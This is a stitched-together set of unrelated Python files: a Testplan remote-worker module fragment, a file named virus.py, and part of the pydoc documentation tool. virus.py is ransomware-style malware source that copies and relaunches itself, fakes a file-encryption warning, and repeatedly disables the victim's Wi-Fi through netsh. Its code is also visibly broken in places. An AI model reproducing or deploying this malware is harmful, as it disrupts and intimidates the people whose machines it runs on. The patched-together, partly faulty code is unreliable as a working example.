self._pool_cfg.max_active_loop_sleep)
next_possible_request = time.time() + request_delay
pass
time.sleep(self._pool_cfg.active_loop_sleep)
self.logger.info('Local pool {} stopped.'.format(self._pool))
def exit_loop(self):
self._pool.abort()
class RemoteChildLoop(ChildLoop):
"""
Child loop for remote workers.
This involves an exchange of metadata for additional functionality.
"""
def __init__(self, *args, **kwargs):
super(RemoteChildLoop, self).__init__(*args, **kwargs)
self._setup_metadata = None
def _pre_loop_setup(self, message):
super(RemoteChildLoop, self)._pre_loop_setup(message)
self._setup_metadata = self._send_and_expect(
message, message.MetadataPull, message.Metadata).data
if self._setup_metadata.env:
for key, value in self._setup_metadata.env.items():
os.environ[key] = value
os.environ['TESTPLAN_LOCAL_WORKSPACE'] = \
self._setup_metadata.workspace_paths.local
os.environ['TESTPLAN_REMOTE_WORKSPACE'] = \
self._setup_metadata.workspace_paths.remote
if self._setup_metadata.push_dir:
os.environ['TESTPLAN_PUSH_DIR'] = self._setup_metadata.push_dir
if self._setup_metadata.setup_script:
if subprocess.call(self._setup_metadata.setup_script,
stdout=sys.stdout, stderr=sys.stderr):
raise RuntimeError('Setup script exited with a non-zero code.')
def exit_loop(self):
if self._pool.cfg.delete_pushed:
for item in self._setup_metadata.push_dirs:
self.logger.test_info('Removing directory: {}'.format(item))
shutil.rmtree(item, ignore_errors=True)
for item in self._setup_metadata.push_files:
self.logger.test_info('Removing file: {}'.format(item))
os.remove(item)
# Only delete the source workspace if it was transferred.
if self._setup_metadata.workspace_pushed is True:
self.logger.test_info('Removing workspace: {}'.format(
self._setup_metadata.workspace_paths.remote))
shutil.rmtree(self._setup_metadata.workspace_paths.remote,
ignore_errors=True)
super(RemoteChildLoop, self).exit_loop()
def child_logic(args):
"""Able to be imported child logic."""
if args.log_level:
from testplan.common.utils.logger import TESTPLAN_LOGGER
TESTPLAN_LOGGER.setLevel(args.log_level)
import psutil
print('Starting child process worker on {}, {} with parent {}'.format(
socket.gethostname(), os.getpid(), psutil.Process(os.getpid()).ppid()))
if args.runpath:
print('Removing old runpath: {}'.format(args.runpath))
shutil.rmtree(args.runpath, ignore_errors=True)
from testplan.runners.pools.base import (
Pool, Worker, Transport)
from testplan.runners.pools.process import (
ProcessPool, ProcessWorker, ProcessTransport)
class ChildTransport(ZMQTransport, Transport):
"""Transport that supports message serialization."""
class NoRunpathPool(Pool):
"""
Pool that creates no runpath directory.
Has only one worker.
Will use the one already created by parent process.
"""
# To eliminate an unneeded runpath layer.
def make_runpath_dirs(self):
self._runpath = self.cfg.runpath
def starting(self):
super(Pool, self).starting() # pylint: disable=bad-super-call
self.make_runpath_dirs()
self._metadata['runpath'] = self.runpath
# Create a local thread worker with the process pool index
worker = self.cfg.worker_type(index=args.index,
runpath=self.cfg.runpath)
self.logger.info('Created {}'.format(worker))
worker.parent = self
worker.cfg.parent = self.cfg
self._workers.add(worker, uid=args.index)
# print('Added worker with id {}'.format(idx))
self._conn.register(worker)
self._workers.start()
class NoRunpathThreadPool(Pool):
"""
Pool that creates no runpath directory.
Will use the one already created by parent process.
Supports multiple thread workers.
"""
# To eliminate an unneeded runpath layer.
def make_runpath_dirs(self):
self._runpath = self.cfg.runpath
class NoRunpathProcessPool(ProcessPool):
"""
Pool that creates no runpath directory.
Will use the one already created by parent process.
Supports multiple process workers.
"""
# To eliminate an unneeded runpath layer.
def make_runpath_dirs(self):
self._runpath = self.cfg.runpath
if args.type == 'process_worker':
transport = ChildTransport(address=args.address)
loop = ChildLoop(args.index, transport, NoRunpathPool, 1, Worker,
TESTPLAN_LOGGER)
loop.worker_loop()
elif args.type == 'remote_worker':
if args.remote_pool_type == 'process':
pool_type = NoRunpathProcessPool
worker_type = ProcessWorker
else:
pool_type = NoRunpathThreadPool
worker_type = Worker
transport = ChildTransport(address=args.address)
loop = RemoteChildLoop(
args.index, transport, pool_type, args.remote_pool_size,
worker_type, TESTPLAN_LOGGER, runpath=args.runpath)
loop.worker_loop()
if __name__ == '__main__':
"""
To start an external child process worker.
"""
ARGS = parse_cmdline()
if ARGS.wd:
os.chdir(ARGS.wd)
sys.path.insert(0, ARGS.wd)
if ARGS.testplan:
sys.path.append(ARGS.testplan)
if ARGS.testplan_deps:
sys.path.append(ARGS.testplan_deps)
try:
import dependencies
# This will also import dependencies from $TESTPLAN_DEPENDENCIES_PATH
except ImportError:
pass
import testplan
if ARGS.testplan_deps:
os.environ[testplan.TESTPLAN_DEPENDENCIES_PATH] = ARGS.testplan_deps
child_logic(ARGS)
|
virus.py
|
import shutil
import os
import hashlib
import ctypes
import subprocess, re
import socket
import time
from multiprocessing import Process
main_file_directory = os.getcwd()
user_name = os.getenv('username')
destination_directory = "C://Users//" + user_name
executable_file_directory = destination_directory + "virus.exe"
sha_256 = hashlib.sha256
def warning():
wall_paper_file = "bg.jpg"
ctypes.windll.user32.SystemParametersInfoW(20, 0, wall_paper_file , 3)
ctypes.windll.user32.MessageBoxW(0, "Your file has been encrypted!", "Warning", 0)
def encryption(file_list):
h = hashlib.sha256()
b = bytearray(128*1024)
mv = memoryview(b)
for filename in file_list:
with open(filename, 'rb', buffering=0) as f:
for n in iter(lambda : f.readinto(mv), 0):
h.update(mv[:n])
exit()
def wifi_scraper():
ssid = re.search('(?<=: ).*', re.search(r'(?<=\n) *SSID.*(?=\r\n)', subprocess.check_output('netsh wlan show interfaces', creationflags=subprocess.CREATE_NO_WINDOW).decode('utf-8')).group()).group()
return ssid
def offline_maker(wifi):
def connection_checking():
try:
host = socket.gethostbyname("www.google.com")
s = socket.create_connection((host, 80), 2)
return True
except:
pass
return False
try:
os.system("netsh interface set interface name = " + wifi + " admin=DISABLED")
except:
pass
while True:
connection = connection_checking()
if connection == False:
time.sleep(6)
elif connection == True:
try:
os.system("netsh interface set interface name = " + wifi + "admin=DISABLED")
except:
pass
if main_file_directory is not destination_directory:
shutil.copy(main_file_directory,destination_directory)
os.startfile(executable_file_directory)
exit()
elif main_file_directory is destination_directory:
#start infecting the virus
sub_directory_list = os.listdir()
wifi_name = wifi_scraper()
try:
if __name__ == "__main__":
encryption_process = Process(target = encryption)
encryption_process.start(sub_directory_list)
warning_process = Process(target = warning)
warning_process.start()
offline_maker_process = Process(target = offline_maker)
offline_maker_process.start(wifi_name)
#offline_maker(wifi_name)
#encryption(sub_directory_list)
#warning()
except:
pass
|
pydoc.py
|
#!/usr/bin/env python3
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on the given port on the
local machine. Port number 0 can be used to get an arbitrary unused port.
Run "pydoc -b" to start an HTTP server on an arbitrary unused port and
open a Web browser to interactively browse documentation. The -p option
can be used with the -b option to explicitly specify the server port.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it. This option is
deprecated, since the server can now be controlled directly from HTTP
clients.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/X.Y/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__all__ = ['help']
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88261 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import os
import sys
import builtins
import imp
import io
import inspect
import pkgutil
import platform
import re
import time
import warnings
from collections import deque
from reprlib import Repr
from traceback import extract_tb, format_exception_only
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', result.rstrip()) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = doc.strip().split('\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not lines[1].rstrip():
return lines[0], '\n'.join(lines[2:])
return '', '\n'.join(lines)
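# For example (illustrative): splitdoc('Synopsis line.\n\nLonger description.')
# returns ('Synopsis line.', 'Longer description.').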
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = pairs[1].join(text.split(pairs[0]))
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
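# For example (illustrative): cram('documentation', 10) returns 'doc...tion',
# keeping (10-3)//2 = 3 leading and 10-3-3 = 4 trailing characters around '...'.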
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__',
'__cached__', '__author__', '__credits__', '__date__',
'__version__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
results = []
for (name, kind, cls, value) in inspect.classify_class_attrs(object):
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
results.append((name, kind, cls, value))
return results
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not line.strip():
line = file.readline()
if not line: break
line = line.strip()
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not line.strip():
line = file.readline()
if not line: break
result = line.split('"""')[0].strip()
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (0, None))
if lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
self.filename = filename
self.exc, self.value, self.tb = exc_info
def __str__(self):
exc = self.exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Remove the module from sys.modules and re-import to try
# and avoid problems with partially loaded modules.
# Also remove any submodules because they won't appear
# in the newly loaded module's namespace if they're already
# in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in path.split('.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
PYTHONDOCS = os.environ.get("PYTHONDOCS",
"http://docs.python.org/%d.%d/library"
% sys.version_info[:2])
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError(message)
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS", self.PYTHONDOCS)
basedir = os.path.join(sys.exec_prefix, "lib",
"python%d.%d" % sys.version_info[:2])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'_thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(text.expandtabs())
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, modpkginfo):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = modpkginfo
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def filelink(self, url, path):
"""Make a link to source file."""
return '<a href="file:%s">%s</a>' % (url, path)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return ''.join(results)
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + ', '.join(parents) + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = name.split('.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
('.'.join(parts[:i+1]), parts[i]))
linkedname = '.'.join(links + parts[-1:])
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = self.filelink(url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % ', '.join(info)
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Reference</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda t: self.modulelink(t[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = [value for (key, value) in classes]
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', ' '.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', ' '.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', '<br>\n'.join(contents))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name), name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if hasattr(value, '__call__') or inspect.isdatadescriptor(value):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name)]
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
value = getattr(object, key)
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
attrs.sort(key=lambda t: t[0])
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % ', '.join(parents)
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
